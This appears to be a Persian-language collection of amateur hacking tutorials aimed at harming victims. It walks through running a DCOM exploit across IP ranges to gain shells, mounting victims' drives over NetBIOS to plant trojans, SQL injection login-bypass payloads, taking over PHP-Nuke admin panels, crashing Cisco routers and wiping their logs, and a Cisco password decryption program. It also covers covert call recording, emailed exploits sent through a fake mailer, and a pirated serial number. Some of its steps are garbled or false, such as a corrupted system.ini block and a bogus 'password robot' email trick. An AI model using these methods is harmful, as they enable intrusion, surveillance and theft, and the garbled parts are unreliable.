ma_alireza72@yahoo.com             alireza sabahi

برای هک کردن يه سايت به ترتيب از راه داس به شرحه زير است:
۱.بعد از انصال به شبکه٬ميری تو داس و به شکل زير عمل ميکنی:
C:\>telnet http://www.domail-name.com/ 79

بجای domain-name اسم سایتی که می خوای هکش کنی مینویسی.اگه پورت ۷۹ که در آخر آدرس مورد نظر نوشتی در سرور باز باشه شما وارد ميشويد و گرنه نميشه
۲.اگر پورت باز بود و شما وارد شديد مشغول خراب کاريتون بشين اونش ديگه به من ربطی نداره می خوای چه بلايی سر سايت بياری.

نکته

۱.اگر در هنگام خراب کاری متوجه شدين سرعت سيستمتون خيلی کم شد سری خارج شو.
۲.اگه از ترس اينکه پيدات کنن٬بعد از خراب کاريت فورا ريست نکن.اول ديسکانکت بعد ریست.
۳.همون طور که اول گفتم اگه چيزی از هک سايت و فرمانهای داس نميدونی اصلا بهت توصيه نميکنم اين کارو بکنی.
۳.اينکه من هيچ مسئوليتی ندارم

ma_alireza72@yahoo.com

alireza sabahi

............................................

پيدا كردن  ip يك سايت :

در محيط  dos   در زماني كه به اينترنت وصل هستيم  و ارتباط

برقرار است از فرمان   ping   استفاده مي كنيم  با اين

فرمان ip   سايت مورد نظر بدست مي آيد مثلا ميخواهيم 

بدانيم سايت معروف ياهو داراي چه ip  است

بصورت      www.yahoo.com    pingآن را بدست مي آوريم

درصورتيكه به خواهيد سرعت شما در اينترنت بالا رود يا اينكه

بخواهيد

بفهميد سرعت در چه حدي است ميتوانيد به يك سايت مثلا ياهو

يا هر سايت ديگر به صورت   t-www.yahoo.com   ping    عمل میکند

ma_alireza72@yahoo.com                   alireza sabahi

براي اينکه از اکانت خود بيشتر يا براي خميشه مصرف کنين همراه من

باشين.

اول فايل System.ini را در سيستم خود سرچ کنين.

و بعد کامل نوشته هاي داخل آن را پاک کنيد و اين را کپي کنين توي اون

و سيو کنين. در ويندوز ايکس پي.

; for 16-bit app support
[drivers]
wave=mmdrv.dll
timer=timer.drv
[mci]
[driver32]
[386enh
Com0@00 Irq0000@0 Buffer=1024
@ number = ( 3,1,4,1,5,9)
@ letters = ( " this", " is ", "a" , "test" )
$word , $ anther - word - ) = ( " one " , "two" )
woafont=dosapp.FON]
woafont=dosapp.FON
EGA80WOA.FON=EGA80850.FON
EGA40WOA.FON=EGA40850.FON
CGA80WOA.FON=CGA80850.FON
CGA40WOA.FON=CGA40850.FON

ma_alireza72@yahoo.com                alireza sabahi

برنامه Modem spy چندين كار مهم را انجام مي دهد كه بنده

آنها را به صورت فهرست وار در زير آورده ام.

1- پيدا كردن شماره تلفن كسي كه با وي چت مي كنيم

2- ظبط مكالماتي كه از تلفن صورت مي گيرد

3- نمايش دادن شماره تلفن شخصي كه به شما تماس مي گيرد(Caller ID)

هر كس اين برنامه را مي خواهد اينجا را كليك كند.
http://www.modemspy.com/ftp/modemspy.zip
اينم رجيستر نامبرش :

Name: modemspy
SN: 14458


خوب حالا روش كا با نرم افزار:

بعد از دريافت و اجراي نرم افزار يك شمايل كوچك در نوار وظيفه ويندوز

مشاهده مي نماييد. كه براي دسترسي به ترم افزار مي توانيد روي آن كليك

كنيد.

ابتدا تنظيمات مربوط به نرم افزار:

روي منوي فايل كليك كرده و گزينه Preferences را انتخاب نماييد. سپس

زبانه Harware را انتخاب نماييد و در آنجا مودم خود را براي نرم افزار مشخص

نماييد. همچنين تيك هر دو گزينه را بزنيد و در پايين اين دو گزينه كارت صوتي

خود را براي نرم افزار مشخص نماييد.حال به سراغ تب Recording برويد اگر

بخواهيد تمامي مكالماتي كه با شما تماس گرفته مي شود را ظبط كنيد بايد

تيك مربوط به گزينه Record all incoming calls را بزنيد در قسمت Answer

a call in seconds نيز در جاي خالي بايد مدت زماني را كه براي فعال شدن

برنامه وقتي كه كسي با شما تماس مي گيرد براي ظبط مكالمات مي باشد

را وارد نماييد كه بهتر است زمان 10 ثانيه باشد. اگر بخواهيد كه شما

مكالماتي كه با ديگران تماس مي گيريد را ظبط كنيد بايد تيك مربوط به گزينه

Record all outcalling … را علامت بزنيد.البته اگر اين تيك فعال باشد برنامه

هر 30ثانيه خط تلفن را براي شناساي اينكه كسي صحبت مي كند يا نه چك

مي نمايد. براي تغيير اين زمان مي توانيد در قسمت Check for dial tone

زمان مربوطه را وارد نماييد.

حال تب Save as را انتخاب نماييد.در قسمت Change format مي توانيد

فرمت مناسب براي ظبط مكالمات را انتخاب نماييد

در قسمت Advanced نيز هيچ گونه تغييري ندهيد در انتها گزينه Apply را

كليك كنيد

حال دوباره به صفحه اصلي برنامه بر مي گرديم.در قسمت Input device

گزينه Modem و در قسمت Outpout device نيز Sound carad را انتخاب

نماييد و هر دو تيك كنار آنها را علامت بزنيد در پايين نرم افزار نيز تيك Record

all incoming calls را نيز علامت بزنيد. خوب تمام شد. اين نرم افزار به

شرطي كا مي كند كه مودم شما از قابليتهايي كه اين نرم افزار دارد و در بالا

معرفي شد پشتيباني كند اگر بعد از نصب نرم افزر با پيغام خطايي مواجه

شديد يعني مودم شما از اين قابليتها پشتيباني نمي كند

حالا فقط کافيه برنامه باز باشه .

اما چگونه هنگام چت شماره تلفن طرف رو پيدا کنيم:

برای اينکار شما بايد اول اين فايل پلاگين رو از اينجا دانلود کنيد.
http://www.modemspy.com/ftp/plugins/networking.msplg

در مرحله بعد اين فايل رو در پوشه plugin در مکانی که نرم افزار نصب شده

کپی کنيد.

حالا ازمنو plugin در بالای نرم افزار گزينه networking را فعال کنيد ( معمولا

خودش فعاله اما کار از محکم کاری عيب نميکنی) توجه کنيد هيچکدام از

تنضيمات آن را تغيير ندهيد . حالا کافيست نرم افزار باز باشد خود نرم افزار به

صورت خودکار شماره طرف رو بهتون نشون ميده .

حالا فقط کافيه برنامه باز باشه .

حالا اگه کار نکرد ديگه تقصير مودمتونه

ma_alireza72@yahoo.com    alireza sabahi 

برای هک کردن ايميل شما نياز به  ۱  ايميل آدرس داريد و اين ميل آدرس فرقی نداره که مال کجا باشه و هيچ مهدوديتی هم نداره........!!!!!
شما با فرستادن اين ايميل خيلی راحت بگم به سرور يا همون ربات سرور ميدين که روبات رو از کار ميندازه و به قول خودمون هنک می کنه و بعدش هر چی که ازش بخواين بهتون ميده که ديگه اين آلی ميشه نه.....؟؟؟؟!!!۱  . در قسمت To  اين آدرس را وارد می کنيد....
pass_sender_servers@yahoo.com
این آدرس ربات پسورد ياب ياهو می باشد....!!!!
۲  . برای قسمت Subject  آدرس ميل قربانی رو کامل بنويسيد مثل asdf@yahoo.com
۳  . در قسمت متن نامه که همون messeg box  می شود به ترتيب مانند پايين عمل کنيد....( من اين قسمت را انگليسی می نويسم تا اشتباه نشه )

(our E-mail adresse(Your password  در اين قسمت که خط اول باشه ايميل آدرس خودتون و پسوردش رو وارد کنيد و اينم بگم که نگران نباشين اين نامه برای سرور ياهو ارسال ميشه نه هيچ فرد يا سرور ديگه......!!! مثلا براي من ميشه :
alirezacracker(spasswordam

در خط دوم این کد رو وارد کنید :

*****___Hotmailpswd_rtrvl_Xtra-----fast-----server(victimspswd)----Snd---bk---anypswd(crack---rtrvl%^&%^&%^&"£""!_______SND_____Free----4635---Yahoo--Aol---Hotmail____(pass_sender_servers@yahoo.com)
Email----Cracker%^&&^&^*(((^%^%$%_@@@------------------SEND....

بعدش یه میل براتون فرستاده میشه که پسوردش داخل همون میل هست

ma_alireza72@yahoo.com                alireza sabahi

با کمک اين exploit که از باگ dcom استفاده مي کند  مي توانيد روي يک رنج ip بدون انجام هيچ کاري وارد سيستم قرباني شويد .بدون داشتن هيچ اطلاعاتي از هک و ارتباط قبلي با قرباني .البته اين باگ ازباگ هاي قديميه ولي  هنوز کار مي کنه و چون  مي خواستيم که شروعي باشه براي ارائه ي باگ هاي کامپايل شده ي جديد که بزودي تو سايت ارائه مي شه . براي کار با اين باگ بعد از داونلود در درايو c خودتون کپيش کنيد   و بعد به منوي استارت بريد و در run رفته cmd را تايپ کنيد .بعد از ورود به cmd و با داشتن ip خود به طور مثال ip من 217.218.190.55 هستش ميرم تو command prompt  مينويسم C:>kaht2.exe 217.218.190.1 217.218.190.254 که با اين کار برنامه اين رنج را براي پيدا کردن سيستم هاي نفوذ پذير چک مي کند و وارد آن ها مي شود و خط فرمان آن ها را در اختيار شما قرار مي دهد (از آن ها شل مي گيرد) 

دانلود

ma_alireza72@yahoo.com                          alireza sabahi

سلام دوستان
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و... حالا در این درس به آموزش چندین روش برای آموزش هک متداول ترین فروم که PHP-Nuke است بپردازیم.
اول باید خصوصیات سایت را بررسی کنید و اولین خوصوصیات ضروری پی اچ پی نوک بودن آن هست! به روش های مختلف هک کردنه یوزر ادمین یا ساختن ادمین مخفی را یاد بگیرید.
در هر سایت نوک یک فروم قرار دارد و همینوطور که میدانید در فروم یک یا چند نفر به cp (مخفف کنترل پانل) دسترسی دارند. شاید از همین فکر چیزی فهمیده باشید. پس در هر تالار چندین کاربر (user) وجود دارد (بستگی به کیفیت تالار دارد) و مدیر هم در بین این کاربران هست و نا کاربری او فاحش هست و می توانید آن را به راحتی ببینید.با این توضیح شما دو روش را برای هم حدس زدید. درسته ! می گن هک سایت سخته ولی اونقدرا هم سخت نیست حتی با ماجیک هم میشه سایت هک کرد! پس فعلا با ماجیک هک می کنیم تا برسیم به جاهای پیشرفته! حالا بايد به سيستم طرف براي نصب تروجان نفوذ كنيد و نت بايوس بهترين راه هست!
نفوذ به سيستم از طريق NetBios
-------------------------------------------
با یاد گیری این مقاله شما میتونید یک درایو از سیستم قربانی رو به وسیله نت بایوس Share کنید و هر کاری که خواستید توی اون درایو انجام بدید ( فایل بذارید ، بردارید ، پاک کنید و ... ) البته من این مقاله رو به صورت تصویری هم تو سایت گذاشتم ، می تونید دانلود کنید.
خب بریم سره موضوع اصلی:
اول باید IP سیستم مورد نظر رو پیدا کنید ( تو سایت قبلا اموزش دادم ) ، بعد از منوی Start قسمت Run برید و تایپ کنید CMD. بعد از اینکه وارد CMD شدید این دستور رو بنویسید:
Net use x: \\IP\DriveName$
به جای X میتونید هر حرفی رو بنویسید به غیر از حروفی که اسم درایو های خودتون هست.مثلا اگه درایو G داشته باشید ، از حرف G نمیتونید استفاده کنید. به جای IP هم ای پی مورد نظر رو که می خواهید بهش نفوذ کنید رو بنویسید. به جای DriveName هم اسم درایو رو بنویسید. اگه مثلا میخواهید درایو C رو Share کنید ، حرف c رو بنویسید.یک نمونه از دستور رو ببینید:
Net use x: \\80.191.191.39\c$
اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید )
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.

يكي از نقطه ضعف هاي Sql رشته ي ساختار ان ميباشد كه هميشه آسيب پذير بوده و مورد حمله قرار ميگيرد اين آموزش به شما روشهايي ياد ميده كه بتوانيد اين ساختار را مورد حمله قرار بدهيد .
حالا ميتوانيد در گوگل عبارت زير را سرچ كنيد :
login.asp
در جواب براي شما تقريبا 17 هزار مورد پيدا ميكند . حالا به لينك يافته ها دقت كنيد مثلا چنين خواهيد يافت :
www.site.com/login.asp
يا چيزهايي مشابه اين . اين قسمتها را ميتوانيم مورد حمله قرار دهيم . حالا به ساده ترين قسمت رسيديم
كافي است براي رد كردن اين مانع بصورت زير عمل كنيد
بجاي يوزر نيم Admin را بزنيد و بجاي پسورد از اين عبارت استفاده كنيد
or 1=1—
شايد تا حالا كه مقاله را خوانده ايد تعجب كرده ايد كه اين امر چگونه امكان پذير است . در تمامي اين عمليات اطلاعات لاگين شما بصورت Query فرستاده ميشود . اگر اطلاعات درست باشد شما اجازه ي ورود خواهيد يافت وگرنه با پيغام Login Failed مواجه خواهيد شد . وقتي شما ارسالي را با يوزر ادمين و با پسورد 1234 را ارسال ميكنيد از حالت اول به حالت دوم تغيير پيدا ميكند :
حالت اول :
"select *from table1 where login=""&log&""and password=""pwd&"" '
حالت دوم‌:

"select *from table1 where login="Admin"and password="1234" '
حالا با استفاده از اين تركيبات شما ميتوانيد با توجه به ساختار اس كيو ال براي آن پسورد هايي ارسال كنيد كه در صورت قرار گرفتن در اين پسورد مورد قبول قرار گيرد و در واقع با استفاده از نقطه ضعف Query Stringsبه آن حمله كند . اين تركيبات كه با توجه به ساختار اس كيو ال نوشته شده به اين صورت ميباشد نمونه هايي از آن مشاهده ميكنيد :
admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

همانطور كه مشاهده كرديد اين روش يك روش ساده اما ابتكاري مباشذ كه احتياج به تفكر دقيق دارد البته ساختار ها متفاوت ميباشند و شما ميتوانيد همه ي اين تركيبات بالا را به عنوان پسورد امتحان كنيد و حتما به جواب خواهيد رسيد .

ma_alireza72@yahoo.com         alireza sabahi

آموزش هک سایت

1.چرا روتر رو هک می‌کنن ؟؟؟
مساله اینه که این سیستم ها معمولا سرعت خیلی‌ زیادی دارند و می‌شه برای

حمله به سایر سیستم ها از شون استفاده کرد مثلا برای حمله DoS به یک سرور و

مثلا دان کردن اونو در ضمن معمولا اطلاعات زیادی به اونا ارسال می‌شه و شاید ما

با این اطلاعات بتونیم سایر کامپیوتر هایی‌ هم که در شبکه اونا موجود هک کنیم.

---------------------------------------------

2.چجوری یه روتر سیسکو پیدا کنیم؟؟؟
خب معمولا هر ISP از یک روتر استفاده میکنه و ساده ترین راه برای

 پیدا کردن اون اینه که یه traceroute از dos کنیم (تایپ کنید '"tracert'" و بعد

 IP یک بابا ایرو هرکی‌ عشق مبارک کشید)خوب این tracertهر کامپیوتر بین

شما و اون بابا رو نشون میده ( IP یش رو) خب اسم یکی‌ از این کامپیوتر های

 کذایی‌ باید "cisco" باشه (این جا این طور نوشته اگه نیست من کاره ای نیستم به خدا)

خب حالا ما میخوایم ببینیم که این "cisco" با فایروال محافظت می‌شه یا نه خب

دو تا راه داره بابام جاناول ping ش می‌کنیم اگه جواب داد یعنی‌ این که فایروال نداره

 (این راه ممکن با اینترنت شما جور در نیاد چون اکثر ISP های ما پرت ping رو می بندن

(مگه مرض دارن ؟؟!! آره دارن!!) پس بهتره روش دوم هم امتحان کنید)
دیم سعی‌ کنیم با تلنت به پرت 23 وصل شویم اگه فقط از ما پسورد خواست

یعنی‌ ایول فایروال نداره ولی‌ اگه یوزرنیم هم خواست یعنی‌ فایروال داره و هتر بیخیالش شیم.
----------------------------------------------

3. حالا برسیم سر اصل مطلب ، هک cisco
روتر هایی‌ که نرم افزار با ورژن 4.1 کار می‌کنن (که معمولا هم اکثر cisco ها اینطوریند)

خیلی‌ راحت و مسخره از کار میفتن فقط کافی‌ شما کافیه به پرت 23 اون ها وصل بشین و وقتی‌ از شما پسورد خواست یه پسورد کت و کلفت بهش بدید که کف کنه یه چیزی مثل این:

10293847465
qpwoeirutyalskdjfhgzmxncbv019dsk1029384746

5qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncb
v019dsk10293847465qpwoeirutyalskdjfhgzmxncbv01

9dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirut
yalskdjfhgzmxncbv019dsk10293847465qpwoei

rutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk

حالا خب اگه روتر آسیب پذیر باشه برای مدت تقریبا دو تا ده دقیقه می پکه و وقتی‌ یه روتر cisco می پکه میره رو حالت default و روی حالت default پسورد اون می‌شه چی‌!
می‌شه "admin" خب ایوول حالا شما باید سریع به اون وصل شین و با پسورد "admin" برید تو

خب حالا اگه شما تایپ کنید '"؟'" لیست command ها رو می‌ بینید
حالا اگه میخواید کسی‌ نفهمه شما تو روتر چیکار کردید تایپ کنید
"terminal history size 0"
حالا میخوایم پسورد رو تغییر بدیم می‌ تایپیم :
conf t
no enable secret
line vty 0 4
password newpassword
ctrl+z حالا دو بار
تایپ کنید rel و کارهایی که میگه بکنید
خب برای پاک کردن رد پاها (که توی کشور ما خیلی‌ بهش توجه می‌کنن!!البته برای جاهای دولتی‌ واقعا خطرناک پس یا سراغ این جاها نرید یا لااقل رد نذارید ) تایپ کنید:

conf t
no ip finger
no logging console
no logging buffer
no logging trap
no logging monitor
no loggin on
no service finger

اگه بگردین ممکن command ای برای transfer فایل گیر بیارید که میتونید از اون برای فرستادن فایل ادمین به کامپیوتر خودتون استفاده کنید و مثلا با HyperTerminalدریافت کنید(مرده ترجمه کردنه خودمم تو یه خط دو تا کلمه فارسی ننوشتم!!) خب این فایل به چه درد میخوره؟؟؟ ما میتونیم با John the Ripper پسورد رو در بیاریم یا با یه برنامه مثل برنامه زیر اون رو
decrypt کنیم

#include
#include

char xlat[] = {
0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44
};

char pw_str1[] = "password 7 ";
char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)
char *enc_pw;
char *dec_pw;
{
unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)
return(-1);

seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {
if(i !=2 && !(i & 1)) {
dec_pw[i / 2 - 2] = val ^ xlat[seed++];
val = 0;
}

val *= 16;

if(isdigit(enc_pw = toupper(enc_pw))) {
val += enc_pw - '0';
continue;
}

if(enc_pw >= 'A' && enc_pw <= 'F') {
val += enc_pw - 'A' + 10;
continue;
}

if(strlen(enc_pw) != i)
return(-1);
}

dec_pw[++i / 2] = 0;

return(0);
}

usage()
{
fprintf(stdout, "Usage: %s -p n", pname);
fprintf(stdout, " %s

n", pname);

return(0);
}

main(argc,argv)
int argc;
char **argv;

{
FILE *in = stdin, *out = stdout;
char line[257];
char passwd[65];
unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)
{
if(argc > 3) {
usage();
exit(1);
}

if(argv[1][0] == '-')
{
switch(argv[1][1]) {
case 'h':
usage();
break;

case 'p':
if(cdecrypt(argv[2], passwd)) {
fprintf(stderr, "Error.n");
exit(1);
}
fprintf(stdout, "password: %sn", passwd);
break;

default:
fprintf(stderr, "%s: unknow option.", pname);
}

return(0);
}

if((in = fopen(argv[1], "rt")) == NULL)
exit(1);
if(argc > 2)
if((out = fopen(argv[2], "wt")) == NULL)
exit(1);
}

while(1) {
for(i = 0; i < 256; i++) {
if((line

= fgetc(in)) == EOF) {
if(i)
break;

fclose(in);
fclose(out);
return(0);
}
if(line == 'r')
i--;

if(line == 'n')
break;
}
pw_pos = 0;
line = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))
pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))
pw_pos = strlen(pw_str2);

if(!pw_pos) {
fprintf(stdout, "%sn", line);
continue;
}

if(cdecrypt(&line[pw_pos], passwd)) {
fprintf(stderr, "Error.n");
exit(1);
}
else {
if(pw_pos == strlen(pw_str1))
fprintf(out, "%s", pw_str1);
else
fprintf(out, "%s", pw_str2);

fprintf(out, "%sn", passwd);
}
}
}

این سورس کذایی‌ رو باید با Linux کامپایل کنید اگر Linux ندارید همون روش اول رو امتحان کنید

راستی‌ اگه روتر در مقابل پسورد کلفت ما عکس العملی‌ نشون نداد میتونیم یه حمله DoS بکنیم مثلا یه ping خفن مثل این "ping -l 56550 cisco.router.ip -t" این هم مثل همون روش پسورد باعث  defaultشدن روتر می‌شه

این برنامه واقعادر نوع خودش بی نظير بود . اما 1. امينت زياد شده . 2 . بايد ایپی خودتو ميدادی تا طرف روش کليک کنه . که این عملم يه نموره احمقانه بود . 3.اینکه طرف آخرش ميفهميد چه بلايی سرش ميخواييد بياريد . همينا بسه ديگه .

همونطور که گفتم نياز به evil http داريم با يه فيک ميلر (Fake Mailer) نيازی به نرم افزارش نيست ميتونيد بريد به این سايت http://www.fake-mailer.com/ (اگر سايتش بالا نيومد از يه فيک ميلر که html ساپورت میکنه استفاده کنيد)
حالا اويل رو باز کنيد اکسپلويت رو انتخاب کنيد (دقيقا نميتونم بگم چه اکسپلويتی رو چه ويندوزی جواب ميده . پس تجربه کنيد . آموزش اويل هم لينکش صفحه اول هست) بعد اینکه اکسپلويت رو انتخاب کرديد . بايد تو باکس آخری http://your ip رووارد کنيد . که بجای your ip ایپی خودتون رو وارد کنيد. حالا به سايت فيک ميلر بريد متونيد هر اسمو آدرسی به عنوان فرستنده وارد کنيد . مثلا test@yahoo.com که باز بستگی به شما و شخص و ذکاوت دو طرف داره . من ميل دوست دخملشو وارد کردم . تو target هم ادرس ميل قربانی رو وارد کنيد .سابجکتم که پای خودتون . حالا توقسمت مسيج کد يه فريم ميديم با لينک ایپی خودمون و بعد اون يه چند واژه رمانتيک .ببينيد: